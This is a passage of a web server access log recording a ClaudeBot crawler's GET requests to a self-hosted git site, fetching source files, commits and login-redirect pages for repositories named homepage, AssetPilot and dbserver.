ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 11003] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16472] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15193] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj" [Client 216.73.216.188] [Length 28270] [Gzip 6.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 216.73.216.188] [Length 13932] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 49856] [Gzip 10.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14197] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13876] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcConnectionTest%2Fobj" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fstatic%2Fjs%2Fapp.js" [Client 216.73.216.188] [Length 54133] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=source" [Client 216.73.216.188] [Length 31033] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11916] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" [Client 216.73.216.188] [Length 14660] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12%2Fgreenlet" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2FProperties" [Client 216.73.216.188] [Length 21729] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15809] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 216.73.216.188] [Length 12769] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fmodels.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Finclude" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11360] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10926] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10886] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 216.73.216.188] [Length 10481] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" [Client 216.73.216.188] [Length 10168] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11647] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.tsx" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 11156] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService" [Client 216.73.216.188] [Length 33367] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 216.73.216.188] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 